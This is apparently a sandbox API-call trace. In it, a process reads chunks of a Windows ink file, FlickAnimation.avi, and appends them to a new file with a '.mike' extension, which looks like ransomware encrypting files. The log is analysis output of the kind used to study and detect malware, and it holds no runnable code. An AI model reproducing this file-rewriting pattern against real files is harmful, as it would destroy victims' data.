GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.992] GetFileType (hFile=0x264) returned 0x1 [0042.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.992] GetFileType (hFile=0x264) returned 0x1 [0042.992] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5220 [0042.992] WriteFile (in: hFile=0x264, lpBuffer=0x2119a64*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2119a64*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.992] CloseHandle (hObject=0x264) returned 1 [0042.993] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.993] GetFileType (hFile=0x264) returned 0x1 [0042.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.993] GetFileType (hFile=0x264) returned 0x1 [0042.994] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7800 [0042.994] ReadFile (in: hFile=0x264, lpBuffer=0x211c4d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x211c4d4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.994] CloseHandle (hObject=0x264) returned 1 [0042.994] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.994] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.995] GetFileType (hFile=0x264) returned 0x1 [0042.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.995] GetFileType (hFile=0x264) returned 0x1 [0042.995] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7a20 [0042.995] WriteFile (in: hFile=0x264, lpBuffer=0x2126a3c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2126a3c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.995] CloseHandle (hObject=0x264) returned 1 [0043.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.002] GetFileType (hFile=0x264) returned 0x1 [0043.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.002] GetFileType (hFile=0x264) returned 0x1 [0043.002] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa000 [0043.002] ReadFile (in: hFile=0x264, lpBuffer=0x21294ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21294ac*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.002] CloseHandle (hObject=0x264) returned 1 [0043.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.003] GetFileType (hFile=0x264) returned 0x1 [0043.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.003] GetFileType (hFile=0x264) returned 0x1 [0043.003] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xa220 [0043.003] WriteFile (in: hFile=0x264, lpBuffer=0x2133a14*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2133a14*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.004] CloseHandle (hObject=0x264) returned 1 [0043.004] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.005] GetFileType (hFile=0x264) returned 0x1 [0043.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.005] GetFileType (hFile=0x264) returned 0x1 [0043.005] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xc800 [0043.005] ReadFile (in: hFile=0x264, lpBuffer=0x2136484, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2136484*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.006] GetFileType (hFile=0x264) returned 0x1 [0043.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.006] GetFileType (hFile=0x264) returned 0x1 [0043.006] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xca20 [0043.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.007] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.007] GetFileType (hFile=0x264) returned 0x1 [0043.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.007] GetFileType (hFile=0x264) returned 0x1 [0043.007] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xf000 [0043.007] ReadFile (in: hFile=0x264, lpBuffer=0x214345c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x214345c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.008] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.008] GetFileType (hFile=0x264) returned 0x1 [0043.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.008] GetFileType (hFile=0x264) returned 0x1 [0043.008] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xf220 [0043.008] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.008] GetFileType (hFile=0x264) returned 0x1 [0043.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.008] GetFileType (hFile=0x264) returned 0x1 [0043.009] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x11800 [0043.009] ReadFile (in: hFile=0x264, lpBuffer=0x2150434, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2150434*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.009] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.009] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.009] GetFileType (hFile=0x264) returned 0x1 [0043.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.010] GetFileType (hFile=0x264) returned 0x1 [0043.010] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x11a20 [0043.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.010] GetFileType (hFile=0x264) returned 0x1 [0043.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.010] GetFileType (hFile=0x264) returned 0x1 [0043.010] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x14000 [0043.010] ReadFile (in: hFile=0x264, lpBuffer=0x215d40c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x215d40c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.011] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.011] GetFileType (hFile=0x264) returned 0x1 [0043.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.011] GetFileType (hFile=0x264) returned 0x1 [0043.011] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x14220 [0043.012] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.012] GetFileType (hFile=0x264) returned 0x1 [0043.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.012] GetFileType (hFile=0x264) returned 0x1 [0043.012] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x16800 [0043.012] ReadFile (in: hFile=0x264, lpBuffer=0x216a3e4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x216a3e4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.013] GetFileType (hFile=0x264) returned 0x1 [0043.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.013] GetFileType (hFile=0x264) returned 0x1 [0043.013] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x16a20 [0043.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.014] GetFileType (hFile=0x264) returned 0x1 [0043.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.014] GetFileType (hFile=0x264) returned 0x1 [0043.014] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x19000 [0043.014] ReadFile (in: hFile=0x264, lpBuffer=0x21773bc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21773bc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.015] GetFileType (hFile=0x264) returned 0x1 [0043.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.015] GetFileType (hFile=0x264) returned 0x1 [0043.015] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x19220 [0043.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.016] GetFileType (hFile=0x264) returned 0x1 [0043.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.016] GetFileType (hFile=0x264) returned 0x1 [0043.016] SetFilePointer (in: hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b800 [0043.016] ReadFile (in: hFile=0x264, lpBuffer=0x2184394, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2184394*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.016] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.017] GetFileType (hFile=0x264) returned 0x1 [0043.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.017] GetFileType (hFile=0x264) returned 0x1 [0043.017] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1ba20 [0043.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.017] GetFileType (hFile=0x264) returned 0x1 [0043.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.017] GetFileType (hFile=0x264) returned 0x1 [0043.018] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e000 [0043.018] ReadFile (in: hFile=0x264, lpBuffer=0x219136c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x219136c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.019] 